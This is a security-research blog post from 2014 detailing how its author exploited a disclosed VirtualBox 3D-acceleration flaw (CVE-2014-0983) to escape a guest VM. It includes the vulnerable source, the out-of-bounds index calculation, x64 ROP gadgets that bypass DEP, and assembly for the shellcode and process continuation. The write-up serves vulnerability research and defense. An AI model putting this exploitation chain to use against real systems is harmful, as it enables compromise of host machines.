About Us | Contact Us    



VUPEN Research

  VUPEN Research Team
  VUPEN Research Blog
  VUPEN Research Videos

VUPEN Vulnerability Research Team (VRT) Blog

Advanced Exploitation of VirtualBox 3D Acceleration VM Escape Vulnerability (CVE-2014-0983)
Published on 2014-07-25 18:21:38 UTC by Florian Ledoux, Security Researcher @ VUPEN

Twitter LinkedIn   

Hi everyone,

In a previous blog, we have shared our exploitation technique for a critical guest-to-host escape vulnerability affecting the Xen hypervisor. In this new blog post we will focus on another VM escape vulnerability, this time affecting VirtualBox.

A few months ago, our friends from Core Security have released an advisory for multiple memory corruption vulnerabilities affecting VirtualBox and potentially allowing a user/program within a Guest OS to escape the virtual machine and execute arbitrary code on the Host OS.

A few weeks ago, during REcon 2014, Francisco Falcon has demonstrated that it was possible to combine these vulnerabilities and exploit them to achieve a guest-to-host escape on a 32bit Windows host.

In this blog, we share our exploitation technique to achieve a reliable VM escape on a 64bit Windows 8 host using just one vulnerability (CVE-2014-0983), and without crashing the VirtualBox process (aka process continuation).

1. Technical Analysis of the Vulnerability

Multiple memory corruption vulnerabilities exists in VirtualBox 3D acceleration for OpenGL graphics. In this analysis we will focus on CVE-2014-0983.

From the guest OS point of view, guest additions run multiples services like drag and drop, shared clipboard, graphic rendering, etc. One of these services is called "SharedOpenGL". It provides remote rendering of OpenGL graphics through a client/server model when 3D Acceleration is enabled in VirtualBox (disabled by default). The guest OS acts as a client and sends render messages to the "VBoxGuest.sys" driver. This driver then forwards messages by PMIO/MMIO to the host (acting as a server) which parses them. More details about VirtualBox and 3D are available

There are many render messages one of which is "CR_MESSAGE_OPCODES". Its structure is composed of opcodes (command IDs) followed by data. The "crUnpack()" function handles all opcodes at server side (host OS):

 static void
 crServerDispatchMessage(CRConnection *conn, CRMessage *msg) {
const CRMessageOpcodes *msg_opcodes;

    CRASSERT(msg->header.type == CR_MESSAGE_OPCODES);

    msg_opcodes = (const CRMessageOpcodes *)msg;
    data_ptr = (const char *) msg_opcodes + sizeof(CRMessageOpcodes) + opcodeBytes;
    crUnpack(data_ptr,                                          /* first command operands */
                  data_ptr - 1,                                     /* first command opcode */
                  msg_opcodes->numOpcodes,             /* how many opcodes */
                  &(cr_server.dispatch));                      /* the CR dispatch table */

Content of the "crUnpack()" function is automatically generated during installation of VirtualBox by a python script located at "src/VBox/HostServices/SharedOpenGL/unpacker/unpack.py". This function acts as a switch to different functions according to the opcode being processed.

By sending a message containing opcode "CR_VERTEXATTRIB4NUBARB_OPCODE" (0xEA), "crUnpack()" calls "crUnpackVertexAttrib4NubARB()". This function parses the render message received from the guest OS without any validation or check:

 static void crUnpackVertexAttrib4NubARB(void)
     GLuint index = READ_DATA( 0, GLuint );
     GLubyte x = READ_DATA( 4, GLubyte );
     GLubyte y = READ_DATA( 5, GLubyte );
     GLubyte z = READ_DATA( 6, GLubyte );
     GLubyte w = READ_DATA( 7, GLubyte );
     cr_unpackDispatch.VertexAttrib4NubARB( index, x, y, z, w );
      INCR_DATA_PTR( 8 );

void SERVER_DISPATCH_APIENTRY crServerDispatchVertexAttrib4NubARB(GLuint index, GLubyte x, GLubyte y, GLubyte z, GLubyte w ) {
     cr_server.head_spu->dispatch_table.VertexAttrib4NubARB(index, x, y, z, w );
      cr_server.current.c.vertexAttrib.ub4[index] = cr_unpackData;

Due to the lack of validation of the array index, memory located after the "cr_server.current.c.vertexAttrib.ub4" array can be corrupted by "cr_unpackData".

 .text:000007FA24376440 crServerDispatchVertexAttrib4NubARB proc near
 .text:000007FA24376440 var_18 = byte ptr -18h
 .text:000007FA24376440 arg_20 = byte ptr 28h
 .text:000007FA24376440 push rbx
 .text:000007FA24376442 sub rsp, 30h
 .text:000007FA24376446 movzx eax, [rsp+38h+arg_20]
 .text:000007FA2437644B mov ebx, ecx ; index
 .text:000007FA2437644D mov [rsp+38h+var_18], al
 .text:000007FA24376451 mov rax, cs:head_spu
  // dispatch_table.VertexAttrib4NubARB
 .text:000007FA24376458 call qword ptr [rax+1498h]
  // pointer to controlled opcode data
 .text:000007FA2437645E mov rax, cs:cr_unpackData
 .text:000007FA24376465 lea rcx, cr_server_current_c_vertexAttrib_ub4
 .text:000007FA2437646C mov [rcx+rbx*8], rax ; crash
 .text:000007FA24376470 add rsp, 30h
 .text:000007FA24376474 pop rbx
 .text:000007FA24376475 retn
 .text:000007FA24376475 crServerDispatchVertexAttrib4NubARB endp

Which could be exploited by a malicious user or program on a VM guest OS to execute arbitrary code on the host OS.

2. Exploitation on Windows 8 (64bit) Host

To exploit this vulnerability from a guest VM, we need to write and use a malicious program to send the malformed message to the host through available guest addition drivers.

The vulnerable function "crUnpackVertexAttrib4NubARB" is located in "VBoxSharedCrOpenGL.dll" while the array is located in the .data section:

 .data:000007FA2444B518 cr_server_current_c_vertexAttrib_ub4 db ?

Thus, memory following the "cr_server.current.c.vertexAttrib.ub4" array address can be corrupted with "cr_unpackData". "cr_unpackData" is a pointer to the render message sent from guest OS.

Memory of "VBoxSharedCrOpenGL.dll" in the host OS can then be corrupted relatively to the "cr_server.current.c.vertexAttrib.ub4" array. With this write4 primitive we can e.g. corrupt a function pointer located in the .data section. By looking at the vulnerable function, we can see:


Which can be translated into assembly:

 .text:000007FA24376451 mov rax, cs:head_spu
 // dispatch_table.VertexAttrib4NubARB
 .text:000007FA24376458 call qword ptr [rax+1498h]

Where "cr_server.head_spu" lands in the .data section:

 .data:000007FA2444CA60 head_spu dq

This is the address to be corrupted. "cr_server.head_spu" is located right after the array, so a positive index is needed for our corruption:

 .text:000007FA2437646C mov [rcx+rbx*8], rax                              // corruption
 .data:000007FA2444B518 cr_server_current_c_vertexAttrib_ub4 db // array
 .data:000007FA2444CA60 cr_server_head_spu dq                          // target

Index can be calculated as follows:

 0x7FA2444CA60  0x7FA2444B518 = 0x1548
 0x1548 / 8 = 0x2A9

After corrupting "cr_server.head_spu", the host OS has already finished the parsing of our rendering message and there is no code redirection. But when the same message containing opcode "CR_VERTEXATTRIB4NUBARB_OPCODE" (0xEA) is sent again "cr_server.head_spu" is used again in:

 .text:000007FA24371E30 push rbx
 .text:000007FA24371E32 sub rsp, 20h
 .text:000007FA24371E36 mov ebx, ecx
 .text:000007FA24371E38 call crStateBegin
 .text:000007FA24371E3D mov rax, cs:head_spu
 .text:000007FA24371E44 mov ecx, ebx
 .text:000007FA24371E46 add rsp, 20h
 .text:000007FA24371E4A pop rbx
 .text:000007FA24371E4B jmp qword ptr [rax+0B0h]

Since "cr_server.head_spu" has been corrupted by "cr_unpackData" (referring to our controlled data), the jump instruction relative to rax+0xB0 will redirect the execution flow.

Next step is to pivot the stack. By default, VirtualBox has ASLR/DEP enabled for all components except for "VBoxREM.dll" which does not opt-in for ASLR, thus we can take advantage of it during our exploitation (of course it is also possible to exploit another vulnerability to achieve a leak memory).

Here is the state of all registers when we redirect the execution flow:

 rax=000000004b09f2b4 rbx=000000004b09f2b0 rcx=0000000000000331
 rdx=0000000000000073 rsi=0000000000000001 rdi=000007fa2444ca68
 rip=000007fa24371e4b rsp=00000000055afb78 rbp=000000004b09f2a6
 r8=7efefefefefefeff r9=7efefefefefeff72 r10=0000000000000000
 r11=8101010101010100 r12=0000000000000004 r13=000007fa24360000
 r14=000007fa1d7b0000 r15=000000004aa16a50
 iopl=0 nv up ei pl nz na pe nc
 cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
 000007fa' 24371e4b 48ffa0b0000000 jmp qword ptr [rax+0B0h]

Registers RAX, RBX and RBP point to the render message:

 0:015> dd rax
 00000000' 4b09f2b4 000002a9 42424242 42424242 42424242
 0:015> dd rbx
 00000000' 4b09f2b0 00000331 000002a9 42424242 42424242
 0:015> dd rbp
 00000000' 4b09f2a6 0008f702 00300000 03310000 02a90000
 00000000' 4b09f2b6 42420000 42424242 42424242 42424242

They contain the rendering opcode, followed by our fully controlled data.

To summarize, our stack pivot cannot simply finish with instruction RET, JMP [register], CALL [register]. x64 compilers can optimize the last call made from a function by replacing it with a jump to the callee. This helps us to find a suitable pivot such as this one:

 ; Gadget 1: 6a689670
 mov rax,qword ptr [rdx+rax] ds:00000000' 4b09f327=000000006a6810db
 add rsp,28h
 mov rdx,rbx
 pop rbx
 jmp rax

RDX register is always set to 0x73. Hence, the first instruction will move controlled data to RAX.

LEAVE instruction will set RSP to RBP value (which points to our message as well). Then we jump to RAX register (our next gadget).

Now that RSP is controlled, a x64 ROP can be used to call "VirtualProtect()" and achieve code execution. Without diving in each gadget details, the first one will lift the stack (POP RSI, RDI, RBP, R12). Then the following gadgets will be used:

 ; Gadget 2: control RDX value
 pop rdx
 xor ecx,dword ptr [rax]
 add cl,cl
 movzx eax,al

 ; Gadget 3: set RAX to RSP value
 lea rax,[rsp+8]

 ; Gadget 4: set RAX to RSP + RDX (offset)
 lea rax,[rdx+rax]

 ; Gadget 5: Write stack address (EAX) on the stack (with index RDX)
 add dword ptr [rax],eax
 add cl,cl

With those gadgets, RSP value can be written anywhere on the stack (depending on RDX value). Now that the stack is controlled, the following gadget will be used to call "VirtualProtect()" and bypass DEP:

 ; Gadget 6
 mov r9,r12
 mov r8d,dword ptr [rsp+8Ch]
 mov rdx,qword ptr [rsp+68h]
 mov rcx,qword ptr [rsp+50h]
 call rbp

Thanks to the second gadget (stack lifting) we control R12 and RBP.

(Note: Unlike x86, on x64 systems the 4 first function parameters are not pushed on the stack. Fast call Registers RCX, RDX, R8, R9 are used as parameters instead).

Now the stack contains controlled data and we are able to write RSP value into it. Therefore all function parameters can be setup. Finally "VirtualProtect()" is called by setting RBP to 0x6a70bb20:
 .text:000000006A70BB20 jmp cs:VirtualProtect

Unlike x86, RBP register is used to access parameters and local variables on the stack. It is not a frame pointer anymore.
 ; .text: 0x6a709292
 call rbp (0x6a70bb20)

 ; .text: 0x6A70BB20
 jmp cs:VirtualProtect

 ; KERNEL32!VirtualProtectStub
 jmp qword ptr [KERNEL32!_imp_VirtualProtect (000007fa' 2ccce2e8)]

 ; KERNELBASE!VirtualProtect
 mov rax,rsp

"VirtualProtect()" is then executed and stack permissions are set to RWE. The last gadgets will redirect the execution flow:
 ; Gadget 7
 lea rax, [rsp+8]

 ; Gadget 8
 push rax
 adc cl,ch

Now our data sent from the guest OS is executed in the host OS's context despite exploit mitigations in place.

Shellcode and Process Continuation

The aim now is to execute our x64 shellcode without crashing the VirtualBox process (aka process continuation).

The first instruction executed is quite sensitive because RSP (stack pointer) is nearly equivalent to RIP (instruction pointer). So RSP has to be moved somewhere else at the end of our rendering message:

The 3D rendering message is allocated on the guest OS and its components are known (opcodes, ROP, pre-shellcode, shellcode, post-shellcode, shellcode stack size). Hence we are able to craft this message according to the shellcode and the stack size needed.

Pre-shellcode to be used:

 4ab9a30e 90 nop
 4ab9a30f 90 nop
 4ab9a310 4881c4XXXXXXXX add rsp,X

Now that stack pointer is at a safe location, our shellcode can be executed. Then our post-shellcode is reached to repair:

- Stack pointer (RSP)
- Corrupted function pointer in the .data section (cr_server.head_spu)

To retrieve the original stack pointer, Thread Environment Block (TEB) is used. This structure can be accessed thanks to the GS register. TEB starts with a structure which contains everything we need:

 typedef struct _NT_TIB
     PVOID StackBase;
     PVOID StackLimit;

Once the stack base is found, a pattern matching can be used to get the original stack:
 mov eax,dword ptr gs:[10h]           // retrieve stack base
 xor rbx,rbx
 Label1:                                         // pattern matching
 inc rbx
 cmp dword ptr [rax+rbx*4],331h    // opcode argument
 inc rbx
 cmp dword ptr [rax+rbx*4],2A9h   // index used for corruption
 inc rbx
 cmp dword ptr [rax+rbx*4],42424242h // Heh ;)
 rax,[rax+rbx*4]                           // retrieved RSP
 add rax,270h                               // skip embarrassing functions
 mov rsp,rax

The stack pointer which was found is added to 0x170 + 0x100 (0x170 is added to reach the call stack state we had before code flow redirection. And then 0x100 bytes are skipped to avoid the message parsing function in blue):

 # Memory Call Site
 01   8 VBoxSharedCrOpenGL!crUnpack+0xc8
 02 70 crServerVBoxCompositionSetEnableStateGlobal+0xdbca
 03 30 crServerVBoxCompositionSetEnableStateGlobal+0xdd59
 04 30 crServerServiceClients+0x18

05 30 crVBoxServerRemoveClient+0x18b
 06 30 VBoxSharedCrOpenGL+0x19cb
 07 60 VBoxC!VBoxDriversRegister+0x46002
 08 70 VBoxC!VBoxDriversRegister+0x442dc
 09 30 VBoxRT!RTThreadFromNative+0x20f

With a RET instruction, code can recover his initial flow. But before that, "cr_server.head_spu" has to be repaired.

"cr_server.head_spu" is corrupted by the exploit. The default value of this variable is a heap address containing a virtual function table. Trying to retrieve the original heap address is not easy as:

- Each Windows version has a different and complex heap format
- No pattern matching; Heap content is a function table

A simple solution is to reuse existing code. Note that "crVBoxServerRemoveClient()" of "VBoxSharedCrOpenGL.dll" is located on top of the stack. Its address is located at the beginning of the .text section. Each library mapped in memory is aligned, so if we keep only the high part of the function address we can obtain "VBoxSharedCrOpenGL" base.

 mov rsp,rax
 // take VBoxSharedCrOpenGL!crVBoxServerRemoveClient+0x18b
 mov rax,qword ptr [rax]
 and rax,0FFFFFFFFFFFF0000h     // get VBoxSharedCrOpenGL.dll base

Knowing "VBoxSharedCrOpenGL" base our post-shellcode routine can call other functions such as "crVBoxServerInit()". This function calls "crServerSetVBoxConfigurationHGCM()" which repairs "cr_server.head_spu".

 GLboolean crVBoxServerInit(void)


   if (!cr_server.head_spu)
         return GL_FALSE;

    crStateDiffAPI( &(cr_server.head_spu->dispatch_table) );

   return GL_TRUE;

void crServerSetVBoxConfigurationHGCM()
int spu_ids[1] = {0};
char *spu_names[1] = {"render"};
char *spu_dir = NULL;

    cr_server.head_spu = crSPULoadChain(1, spu_ids, spu_names, spu_dir, &cr_server);


And then comes the last part of our post-shellcode:

 mov rsp,rax
 // take VBoxSharedCrOpenGL!crVBoxServerRemoveClient+0x18b
 mov rax,qword ptr [rax]
 and rax,0FFFFFFFFFFFF0000h // get VBoxSharedCrOpenGL.dll base
 push rax
 add rax,4630h                    // get VBoxSharedCrOpenGL!crVBoxServerInit
 call rax                              // auto-repair
 pop rax
 ret                                    // return to the orignial call stack

Which leads to a reliable VM-to-host escape and arbitrary code execution on the 64bit host OS without crashing VirtualBox.

Copyright VUPEN Security


VUPEN Solutions  











2004-2014 VUPEN Security - Copyright - Privacy Policy